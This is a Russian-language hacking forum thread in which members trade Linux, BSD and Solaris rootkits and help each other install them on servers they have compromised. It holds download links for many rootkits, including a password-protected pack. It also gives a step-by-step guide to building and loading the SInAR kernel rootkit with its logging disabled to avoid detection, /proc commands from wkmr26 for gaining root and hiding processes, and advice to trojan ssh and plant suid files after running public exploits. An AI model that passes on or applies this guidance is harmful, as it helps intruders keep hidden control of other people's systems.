У кого нибудь есть что нить проверенное чтобы не запароть ядро а наверняка сработал ???

Пока склоняюсь к adore-ng 0.53 но боюсь ядро испортит....

P.s
Извеняюсь если не туда запостил... в общие разделы не хотелось....

IntoXonia - LKM rootkit for Linux Kernel 2.6.x

(*) скрытие файлов/каталогов
(*) скрытие процессов
(*) имитация полного удаления файлов
(*) перенаправление обращения к файлам
(*) перенаправление входа в директории
(*) запрет на обращение к файлам
(*) запрет на вход в каталог
(*) добавление фиктивной строки в файл
(*) скрытие строки из файла
(*) замена строк в файле при чтении
(*) защита файла от удаления
(*) сохранение файла при удалении
(*) защита процессов
(*) создание алиасов для команд
(*) перенаправление запуска бинарников
(*) запрет на запуск программ
(*) запись всех нажатых клавиш (кейлоггер)
(*) сниффер POP3/FTP паролей
(*) сохранение настроек в файл
(*) загрузка настроек из файла
(*) получение прав root
(*) смена uid/gid процесса
(*) защищенное удаление файлов
(*) настройка с помощью фиктивного бинарника
(*) защита всех настроек паролем
Отечественная разработка так сказать...

Закачка ТУТА (http://satanic.easycoding.org/release/itx-ng-0.1-rc2.tgz)

+toxa+

Давно хотел спросить, откуда у тебя эта ссылка?. :). Её через сайт не найдешь вроде..

SladerNon
http://damagelab.org/index.php?showtopic=5633&hl=intoxonia
http://damagelab.org/index.php?showtopic=9420&hl=intoxonia

http://web-hack.ru/archive/news.php?go=1218
http://web-hack.ru/archive/news.php?go=1129

И как ты не разглядел...
http://satanic.easycoding.org/release.html

Зачем 0.53, когда давно уже есть 0.54
http://stealth.openwall.net/rootkits/adore-ng-0.54.tgz

Неуверен в стабильной работы с ядром, как вариант, - троянь ssh
http://www.gotfault.net/research/tool/ssheater/ssheater-1.1.tar.gz

Народ напишите кто каким руткитом пользуется!
У меня не всегда работает shv5. Кто еще че посоветует?

IntoXonia - LKM rootkit for Linux Kernel 2.6.x

https://forum.antichat.ru/thread21939.html

t0rnkit

насчет последнего мона поподробнее. Я сам юзаю shV5, но он не всегда работает, а
IntoXonia - LKM rootkit for Linux Kernel 2.6.x только под 2.6, я так понял. буду ждать!!

А кто-нить скомпилируйте его пожалуйста, с меня +.

Все таки shV5 рулит! Кстати, если я не ошибаюсь и под Free он тоже идет:)

У тебя нету shV5? Тогда мы идем к Вам! Пиши: 652041.

А есть ли какие-нибудь rootkit-ы для Solaris?

Ребятки, ща я вам всё разьясню =)
shv5 "компилить" не надо, он устанавливается. Является редкостным shit, т.к. палится любой пассивной IDS типа chkrootkit и rkhunter. Представляет собой набор протрояненных бинарников системных утилит linux, посему любая утилита контроля целостности палит его по изменённым контрольным суммам md5.
Установка предельно проста ./setup password port.
После установки в папке /usr/include вы найдете файлы file.h, log.h, proc.h, hosts.h - в которые и забиваются имена/номера файлов/портов и т.д.
IntoXonia-ng LKM RootKit от нашего мембера _4epen надо искать на http://hellknights.void.ru
Среди возможностей стоит отметить:
-скрытие файлов
-скрытие процессов
-редирект обращения к файлам
-редирект исполнения программ
-имитация удаления файла
-запрет на обращение к файлам
-запрет на запуск программ
-скрытие вывода команды netstat
-переход в режим суперпользователя
Работает, действительно, только для ядер, старше 2.6.x

Под старые ветки FreeBSD можно попробовать Adore-BSD. Лежит здесь:
http://packetstormsecurity.org/groups/teso/adorebsd-0.34.tar.gz
Для *BSD сейчас вообще что-то маловато, но однажды я испытывал fbsd.rootkit. Очень даже работает.

Из последних и наиболее интересных под Linux советую искать следующие:
mood-nt - 2.4.x/2.6.x kernels suckit2-like, но намного лучше.
enyelkm - LKM-руткит, который не модифицирует sys_call_table.
phalanx - self-injecting LKM руткит для 2.6.x kernels.
suckit2 - крутейшй руткит, которым я пользовался раньше, используя какую-то магию с /dev/kmem, прячет всё налету, не использует System.map, реализован без помощи LKM.

Для солярки сейчас популярен SInAR. Не испытывал, о функционале мне известно мало.

Отстали мы от жизни. Если не фейк, то давно уже есть Adore 0.56. За линком стучимся ко мне в асю или ПМ, кому надо - тот поищет в сети или найдёт меня.

Да вообще что-то дубликатов топиков многовато здесь у вас.

Насчет руткита IntoXonia-ng LKM RootKit от вашего мембера _4epen могу сказать только одно -сырой. Установиться не смог в системе, а похерил что то, теперь команда ls не выполняеться. Рут не дурак - все прикроет.

Отсюда видно, что одни называют логвайперы - руткитами, другие - пользуют то что палиться (следовательно не пользуют). А третьи пользуют и хрен когда отпишуться, потому что и дальше хотят пользовать.

Улыбчивая такая темка.

Написать свой непалящийся руткит не так уж сложно - способы-то все известны.
Например, все неплохо описано вот в этой книге (http://oz.by/books/more.phtml?id=1028618&isw=1280&ish=1024).

Насчет руткита IntoXonia-ng LKM RootKit от нашего мембера _4epen могу сказать только одно - сырой. Установиться не смог в системе, а похерил что то, теперь команда ls не выполняеться. Рут не дурак - все прикроет.
Простите, НАШЕГО - значит мембера Hell Knights. Что-то ты попутал =)
Сырой - не спорю. Там же ясно написанно 0.1-rc2.А на какое ядро ставил? Если старше 2.6.18 - то не поставишь. Я сейчас новый релиз itx готовлю (развиваю проект с одобрения черепа) - новая версия эту багу уже исправляет. И почему, кстати, ты уверен что ты его не поставил =) Я когда первый раз ставил тоже сильно удивился =) Какие ошибки были - мне очень важно знать. Если можно, конфиг сервера тоже опиши (uname -a, lsmod и т.д побольше инфы).
...А третьи пользуют и хрен когда отпишуться, потому что и дальше хотят пользовать.
Я ж отписал, что вышел adore-0.55. Он не палится. Стоит только поискать хорошенько. Кто ищет тот всегда найдёт.
itx _4epen тоже просто так релизил?! Он не палится, юзайте на здоровье. Только README читайте _внимательно_. Кажется, для особо одарённых придётся ещё и ридми подправить.
Например, все неплохо описано вот в этой книге.
Верно, описанно неплохо. Если ты читал, то мог заметить, что за основу взят всё тот же adore+itx. Кое-где даже строки похожи. Вы комментарии в ItX видели? Это ж открытая книга - бери и пиши свой - нехочу.

shv5 палится любой пассивной IDS типа chkrootkit и rkhunter
sic!

ShadOS, почему itx-ng-0.1-rc2 не скрывает сетевые соединения? так и не удалось понять.
при загрузке еще в логи пишется
kernel: itx: module license 'unspecified' taints kernel
какой руткит сам используешь?

>>ShadOS, почему itx-ng-0.1-rc2 не скрывает сетевые >>соединения? так и не удалось понять.
Читаем внимательно readme. Череп всё написал:

... в рутките отсутствует возможность скрытия вывода
статистики netstat. Это все реализуется скрытием отдельных строчек в файле, так что
за недостаток это считать, я думаю, не стоит ;) ...

Однако сие "неудобство" мне тоже не понравилось.
Добавлю в новой версии такой дополнительный функционал сокрытия.

>>при загрузке еще с логи пишется
>>kernel: itx: module license 'unspecified' taints kernel
"с логи" - это как? =) Давай подробную инфу давай о ядре, его конфигурации, версии, о системе и т.д. Обычно такое не встречается, но исправим, если я правильно понял что там случилось.

>>какой руткит сам используешь?
Естественно, ItX-ng

когда происходит insmod itx.ko, то
в syslog пишется вышеприведенная информация.
это было на ядрах 2.6.14.2 и 2.6.16.34
uname -a
2.6.14.2 #1 PREEMPT i686 unknown unknown GNU/Linux,
а на 2.6.15.1 всё ок.
мистика какая-то.
что еще про конфиг ядра написать?

Спасибо, уже достаточно.

кто-ниб для Solaris использовал SInAR? а то что-то как-то не хочет собираться, может кто подскажет?

cap_nemo
Напиши версию Solaris, тогда можно будет тебе помочь. (:

1)SunOS 5.10 Generic i386
gcc version 3.4.3

2)SunOS 5.10 Generic sparc
gcc version 3.4.3

еще что-ниб надо?
пробую SInAR-0.3

cap_nemo
Попробуй использовать rootkitSunos - он довольно надежен и в большинстве случаев удачно собирается. В архиве подробный ридми.
_http://www.ciar.org/ttk/tools/trojans/rootkitSunOS.tgz

cap_nemo
Попробуй использовать rootkitSunos

Это же очень старый кит... Пусть лучше отладочные сообщения для SinAR скинет - разберёмся.

ShadOS
Так ведь и у него очень старая солярка.
По собственному опыту - rootkitSunOS довольно надежный руткит.

ShadOS
Так ведь и у него очень старая солярка.
По собственному опыту - rootkitSunOS довольно надежный руткит.
Зачем искать лёгкие пути?! Непохек =) Кроме того ты ошибся в другую сторону. 5.10 - это одна из новейших.
Они по такому принципу именуются:
Solaris 2.6 - начиная с ней sun убрали индекс 2. из названия, получилось:
Solaris 7 = SunOS 5.7, а, например, Solaris 10 = SunOS 5.10.
Новее, кажется, будет только OpenSolaris. Но это другая история.

ShadOS
Точно, я перепутал номерацию версий (http://en.wikipedia.org/wiki/Solaris_Operating_Environment).
Но все равно руткит должен встать.

ShadOS
Так ведь и у него очень старая солярка.
По собственному опыту - rootkitSunOS довольно надежный руткит.
не встало

Пусть лучше отладочные сообщения для SinAR скинет - разберёмся

# make
gcc -Wall -D_KERNEL -DSVR4 -DSOL2 -D__i386 -c sinar.c -o sinar.o
sinar.c:75: warning: missing braces around initializer
sinar.c:75: warning: (near initialization for `modlinkage.ml_linkage')
sinar.c: In function `_init':
sinar.c:258: warning: assignment makes pointer from integer without a cast
sinar.c:269: warning: assignment makes pointer from integer without a cast
sinar.c:272: warning: assignment makes pointer from integer without a cast
ld -r sinar.o -o sinar

брал здесь
_http://packetstormsecurity.org/UNIX/penetration/rootkits/SInAR-0.3.tar.bz2

А у тебя точно i386? `uname -a` пожалуйста. Я что-то с такой проблемой не столкнулся... вроде всё собралось на i386. Предупреждения вроде не критичны. Покажи что там в строках 70-80 (нужна 75 с предупреждением). Если у тебя больше ничего из отладки не вывелось - значит собрался. Юзай =)

В тему itX-ng: выпустил новую версию (0.2). Подробности у нас на сайте (hellknights.void.ru)

А у тебя точно i386? `uname -a` пожалуйста.
Покажи что там в строках 70-80 (нужна 75 с предупреждением). Если у тебя больше ничего из отладки не вывелось - значит собрался. Юзай =)


#uname -a
SunOS unknown 5.10 Generic_118855-33 i86pc i386 i86pc
#

Покажи что там в строках 70-80 (нужна 75 с предупреждением). Если у тебя больше ничего из отладки не вывелось - значит собрался. Юзай =)

вообщем с 73 по 77:

static struct modlinkage modlinkage = {
MODREV_1,
(void *)&modlmisc, /*75 cтрока*/
NULL
};



# gcc -Wall -D_KERNEL -DSVR4 -DSOL2 -D__i386 -c sinar.c -o sinar.o
sinar.c:75: warning: missing braces around initializer
sinar.c:75: warning: (near initialization for `modlinkage.ml_linkage')
sinar.c: In function `_init':
sinar.c:258: warning: assignment makes pointer from integer without a cast
sinar.c:269: warning: assignment makes pointer from integer without a cast
sinar.c:272: warning: assignment makes pointer from integer without a cast



я как понимаю - собирается модуль ядра, может я его как-то неправильно подгружаю? как это правильно сделать?

1) Покажи содержимое /etc/system
2) Загрузка модуля выполняется, например, командой
modload misc/sinar
Если конечно модуль находится в каталоге /kernel/misc (пространстве имен misc).
Если не получится, покажи sysdef | tail -20
Потом ls -l /kernel
Если загрузился (проверь), покажи modinfo | grep sinar
Выгрузить модуль можно следующим образом:
modunload -i <id модуля>
id модуля можно узнать из modinfo.

P.S. может топик пора запинить в топ как важный?

1) Покажи содержимое /etc/system
2) Загрузка модуля выполняется, например, командой
modload misc/sinar
Если конечно модуль находится в каталоге /kernel/misc (пространстве имен misc).
Если не получится, покажи sysdef | tail -20
Потом ls -l /kernel



не грузится

#sysdef | tail -20
*
* IPC Messages module is not loaded
*
*
* IPC Semaphores module is not loaded
*
*
* IPC Shared Memory
*
* The IPC Shared Memory module no longer has system-wide limits.
* Please see the "Solaris Tunable Parameters Reference Manual" for
* information on how the old limits map yo to resource controls and
*the prctl(1) and getrctl(2) manual pages for information on
*observing the new limits.
*
*
* Time Sharing Scheduler Tunables
*
60 maximum time sharing user priority (TSMAXUPRI)
SYS system class name (SYS_NAME)


#ls -l /kernel
total 4038
drwxr-xr-x 2 root sys 512 Jan 24 14:36 amd64
drwxr-xr-x 3 root sys 512 Jan 24 14:36 crypto
drwxr-xr-x 3 root sys 512 Jan 24 14:48 dacf
drwxr-xr-x 3 root sys 5120 Jan 24 18:10 drv
drwxr-xr-x 3 root sys 512 Jan 24 14:51 dtrace
drwxr-xr-x 3 root sys 512 Jan 24 14:36 exec
drwxr-xr-x 3 root sys 512 Jan 24 14:48 fs
-rwxr-xr-x 1 root sys 2037864 Nov 10 03:01 genunix
drwxr-xr-x 3 root sys 512 Jan 24 16:42 ipp
drwxr-xr-x 3 root sys 512 Jan 24 16:40 kmdb
drwxr-xr-x 3 root sys 512 Jan 24 14:47 mach
drwxr-xr-x 4 root sys 1536 Mar 6 09:07 misc
drwxr-xr-x 3 root sys 512 Jan 24 14:37 sched
drwxr-xr-x 3 root sys 1024 Jan 24 14:49 strmod
drwxr-xr-x 3 root sys 512 Jan 24 14:44 sys

а модуль в misc скопировал? Пиши всё что пишет система после каждой команды!!! Что modload сказал? И не занимайся оверквотингом - есть очень много ленивых, которые это не будут перечитывать.

http://target0.be/dev/code/otakit/ посмотри тож.

http://target0.be/dev/code/otakit/ посмотри тож.
Жуткое старьё, которое не будет работать на 2.6.x ядрах (посмотри на экспорт sys_call_table). Такой бекдор модуль пишется в течение 15ти минут.

Нашел пак руткитов.


.:::::::::::::::::::::::::::.
r00tKiT f0r *NiX All in One
.:::::::::::::::::::::::::::.



•••r00tKiT•••
-adore-ng 0.56
-bobkit
-Kernel Guard
-lrk5 [src]
-mood-nt
-Other r00tKiT
-Override Rootkit
-Safebreaker Backdoor
-shV5
-suckit 1.3b
-suckit 2.0 rc2 PRiVATE
-tuxkit 1.0

http://rapidshare.com/files/19083244/nr_ao.rar
Pass: d4rk-r3v-t34m

Мембер XND Crew Windex выпустил новую версию руткита, основанного на патчинге VFS под ядра 2.6.x. Функционал самый стандартный: прячет самого себя, файлы, каталоги, процессы.
Использование:

#insmod wkmr26.ko hidden_files="hacktoolz","hydra","nmap"
все файлы и каталоги, содержащие в названии "hacktoolz","hydra","nmap" будут скрыты.
Затем следует авторизоваться:
$echo > /proc/<KEY>

Спрятать процессы можно следующим образом:
$echo > /proc/givemeroot стать суперпользователем
$echo > /proc/hide-<PID> скрыть процесс
$echo > /proc/unhide-<PID> раскрыть прцесс


Как признаётся сам автор, большинство идей было позаимствованно из руткита adore-ng.
Кстати, хорошая статья от самого автора об рутките была в езине HackConnect #1. Рекомендую всем ознакомиться.

Вышла финальная версия руткита от WindEX'a - XND WKMR26 2.0. Добавлены некоторые удобства для конечного пользователя, несколько новых функций. По заявлению автора он выжал из VFS все. Руткит протестирован под:
- 2.6.12-std26-up-alt11 (ALT Linux kernel, no sources)
- 2.6.19.2-grsec (compiled from sources)
- 2.6.17-5mdvlegacy (Mandriva kernel, no sources)
- 2.6.17.6-0.25 or like that (SuSE kernel, no sources, x86_64 arch)
Скачать можно здесь http://xndcrew.org/index.php?module=filesdb&id=1&fid=12&get=1

Убедительная просьба всем, кто ищет информацию о руткитах для FreeBSD или ей побобных, переместиться в соответствующий раздел и топик:
Трояним FreeBSD (http://forum.antichat.ru/thread21648.html)
Заранее спасибо!

Linux Rootkit IV
Cамый популярный руткит для Linux. Последняя версия. Cодержит затрояненые версии
сhfn, chsh, crontab, du, find, ifconfig, inetd, killall, linsniffer, login, ls,
netstat, passwd, pidof, ps, rshd, syslogd, tcpd, top, sshd, su. Имеет набор своих
утилит: bindshell, fix, linsniffer, thesniff, sniffchk, wted, z2.
Вощем рулез форева!
Скачать (http://leo.uinc.ru/uinc-ftp-archive/unix/r00tkits/Linux%20Rootkit%20IV/lrk5.src.tar.gz)

Вощем рулез форева!

Абсолютно ничего рулезного тут нет. Без правильной обработки напильником подобные руткиты просто кричат в системе "МЕНЯ ВЗЛОМАЛИ!!!". И вообще-то системные утилиты надо руками протроянивать, так намного безопаснее, раз уж нет нормального ядерного руткита.

Собственно вопрос.. Получил рута на Linux 2.6.9-34.EL #1 Fri Feb 24 16:44:51 EST 2006 i686 i686 i386 GNU/Linux, скомпилил mood-nt, при запуске (по умолчанию через ./mood-nt -d) получаю эррор - D'ho! Impossibile aprire kmem.
Как запустить его чтобы работал?

Собственно вопрос.. Получил рута на Linux 2.6.9-34.EL #1 Fri Feb 24 16:44:51 EST 2006 i686 i686 i386 GNU/Linux, скомпилил mood-nt, при запуске (по умолчанию через ./mood-nt -d) получаю эррор - D'ho! Impossibile aprire kmem.
Как запустить его чтобы работал?
Скорее всего в этом дистрибутиве (точнее на шелле), нет файла /dev/kmem, он просто не предусмотрен в нём. Не мучайся и попробуй что-нибудь из разряда модульных руткитов (adore-ng, itx-ng)

По поводу SinAR 0.3 для Solaris приведу небольшой мануал по установке и эксплуатации ;)

1) сливаем сам руткит с packetstormsecurity.org (http://packetstormsecurity.org/UNIX/penetration/rootkits/SInAR-0.3.tar.bz2)
2) распаковываем и открываем исходник в любимом редакторе для редактирования:
tar -xjf SInAR-0.3.tar.bz2 -C ./SinAR
cd ./SinAR/src
vim ./sinar.c
3) ищем строки:
#define RK_EXEC_KEY "./sinarrk"
#define RK_EXEC_KEY_LEN 9
и заменяем их на имя бинарника, который необходимо скрывать в системе во время его запуска, например так:
#define RK_EXEC_KEY "/etc/backdoor"
#define RK_EXEC_KEY_LEN 13
4) Все строки, содержащие cnm_err закомментируем, дабы не выдавать своё присутствие в системе (эта функция выводит логи в системный журнал для отладки) и сохраняем сырец
5) выполняем make all в папке с сырцом (собираем модуль)
6) загружаем модуль modload ./sinar (путь к модулю, предварительно рекомендую спрятать)
7)запускаем необходимый бинарник и НЕ наблюдаем его в списке ps ;)
8)запукаем modinfo | grep sinaк и НЕ наблюдаем такого модуля ;)
9)далее всё зависит от вашей фантазии, но учтите что SinAR не умеет скрывать ничего кроме самого себя и одного процесса + всех его потомков в системе (точнее нескольких процессов, созданных одним бинарником). Файлы придётся прятать чем-нибудь другим (или руками). По личному опяту синар является лучшим руткитом для солярки впринципе и его функциональностью вполне можно обходиться.
Надеюсь на этом тема SinAR исчерпана.

Может кто подскажет актуальные и 100% рабочие на данный момент руткиты для linux ядер 2.6.* в частности 2.6.22?

Может кто подскажет актуальные и 100% рабочие на данный момент руткиты для linux ядер 2.6.* в частности 2.6.22?
С новыми ядрами большие траблы. Пишу сейчас.

Ядро 2.6.24.1 тоже уязвимо. Уже пропатчился (https://bugs.gentoo.org/show_bug.cgi?id=209460)

руткиты для 2.6.20 есь?

Ядро 2.6.24.1 тоже уязвимо. Уже пропатчился (https://bugs.gentoo.org/show_bug.cgi?id=209460)
а сам сплоит пробовал в работе ?

Помогите пожалуйста!!!

Получил рута, но вот ни как не получается поставить руткит
при установке itx-ng-0.2-rc1 после команды make вываливается сообщение:

make -C /lib/modules/2.6.17-1.2142_FC4/build SUBDIRS=/tmp/1/intoxonia
make: *** /lib/modules/2.6.17-1.2142_FC4/build: No such file or directory. Stop.
make: *** [kernel-stuff] Error 2

Так же пробывал ставить mood-nt, но нет файла /dev/kmem, поэтому отпадает.

Еще пробывал suckit 2.0 rc2, но не понял как его спомпилирвать

Помогите пожалуйста!!!

Получил рута, но вот ни как не получается поставить руткит
при установке itx-ng-0.2-rc1 после команды make вываливается сообщение:

make -C /lib/modules/2.6.17-1.2142_FC4/build SUBDIRS=/tmp/1/intoxonia
make: *** /lib/modules/2.6.17-1.2142_FC4/build: No such file or directory. Stop.
make: *** [kernel-stuff] Error 2

Так же пробывал ставить mood-nt, но нет файла /dev/kmem, поэтому отпадает.

Еще пробывал suckit 2.0 rc2, но не понял как его спомпилирвать
У тебя либо не стоят исходники ядра, либо симлинк build битый.

Кстати действительно давно уже не слышно никаких новостей о руткитах под свежие ядра. Вчера интоксией завалил сервак под федорой (2.6.18-53), хотя собрался руткит без ошибок. Так вот может посоветуете что-нить актуальное ????

to ShadOS

Есть успехи в доработке руткитов под новые ядра???

Так вот может посоветуете что-нить актуальное ????

ssh backdooring

ssh backdooring
актуально. не спорю. но помимо всего прочего небходимо сокрытие процессов и директорий, а протрояниванием ssh такого эффекта, увы, не добьешься )))

Хммм, а вопрос обратного рода - какими приложениями выявлять - стоит руткит в системе или нет?))) Дабы бороться?)))

З.Ы. Ну и - проверять свои наработки, будет что-то напишется)))

Хммм, а вопрос обратного рода - какими приложениями выявлять - стоит руткит в системе или нет?))) Дабы бороться?)))

З.Ы. Ну и - проверять свои наработки, будет что-то напишется)))

Rootkit hunter попробуй
скачать можно здесь - http://www.rootkit.nl/projects/rootkit_hunter.html

to ShadOS

Есть успехи в доработке руткитов под новые ядра???
Успехи есть. Показать пока не могу =)

Что то тема подзатихла, а на самом деле очень актуален вопрос и поднятия прав на linux и bsd системах и закрепление на оных. если есть у кого то инфа - просьба поделиться )))

После использования паблик-сплоитов трояню ssh. Ну и suid-ники размещаю.
А вы как закрепляетесь?

Собсно у меня пара вопросов.
Хорошо, вот то что прозвучало это то, что прозвучало.
А что если ядро статитком собрано?
Всёбы хорошо, но уже не инсертишь! А коли пересобирать - потом могут при плановой проверке счекить md5!
Тема очень актуальна, поскольку очень много есть беспроводных роутеров с линуксом, но всё чаще встречаю совсем без модулей(оно и понятно, вызов быстрее).

И второе.
Как на всё это снорт реагирует, ктонить проверял?
У меня нет такого большого кол-ва хостов в сети, чтобы чужой опыт тестить безнаказанно :)

После использования паблик-сплоитов трояню ssh. Ну и suid-ники размещаю.


можно поподробнее для новичка как это делается и для чего?

можно поподробнее для новичка как это делается и для чего?
поищи на форуме писали уже
goolge: трояним ssh site:forum.antichat.ru

Подскажите руткит на linux 2.26.22 , 64битная архитектура

попробуй вот этот http://www.milw0rm.com/exploits/8369

навигатор тебе сюда http://ru.wikipedia.org/wiki/Rootkit

сори за тупость, я с эксплойтом перепутал

можно поподробнее для новичка как это делается и для чего?

На этом же сайте полно подробных статей на эти темы написанных грамотными людьми.

Вкратце:
При наличии доступа c ограниченными правами с возможностью выполнения команд (ssh-shell, web-shell) компилируется соответствующих эксплоит (например, c http://milw0rm.com/) и запускается.
suid файлы же - самый простой (и наверное, самый ненадёжный) способ впоследствии при залатывании уязвимости админом, при наличии любого доступа с ограниченными правами получить права root.

А вот как получить любой доступ на хост... Это не в двух словах

Подскажите, есть какие руткиты посвежее, нужно под Linux 2.6.9-89.0.3.ELsmp